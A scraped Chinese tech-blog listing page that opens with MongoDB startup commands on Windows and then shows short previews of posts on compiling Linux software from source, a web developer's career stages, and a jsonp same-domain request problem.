 
D:\MongoDB\data\db
 
4.启动进城:
 
cd D:\MongoDB\bin
 
mongod -dbpath D:\MongoDB\data\db
 
&n
    

    • 

  • Linux下通过源码编译安装程序
pda158
linux

    一、程序的组成部分   Linux下程序大都是由以下几部分组成:   二进制文件:也就是可以运行的程序文件   库文件:就是通常我们见到的lib目录下的文件   配置文件:这个不必多说,都知道   帮助文档:通常是我们在linux下用man命令查看的命令的文档   
二、linux下程序的存放目录   linux程序的存放目录大致有三个地方:   /etc, /b
    

    • 

  • WEB开发编程的职业生涯4个阶段
shw3588
编程Web工作生活

    觉得自己什么都会
2007年从学校毕业,凭借自己原创的ASP毕业设计,以为自己很厉害似的,信心满满去东莞找工作,找面试成功率确实很高,只是工资不高,但依旧无法磨灭那过分的自信,那时候什么考勤系统、什么OA系统、什么ERP,什么都觉得有信心,这样的生涯大概持续了约一年。
根本不是自己想的那样
2008年开始接触很多工作相关的东西,发现太多东西自己根本不会,都需要去学,不管是asp还是js,
    

    • 

  • 遭遇jsonp同域下变作post请求的坑
vb2005xu
jsonp同域post

    今天迁移一个站点时遇到一个坑爹问题,同一个jsonp接口在跨域时都能调用成功,但是在同域下调用虽然成功,但是数据却有问题. 此处贴出我的后端代码片段
$mi_id = htmlspecialchars(trim($_GET['mi_id ']));
$mi_cv = htmlspecialchars(trim($_GET['mi_cv ']));
 贴出我前端代码片段:
$.aj
    

    • 














按字母分类:
ABCDEFGHIJKLMNOPQRSTUVWXYZ其他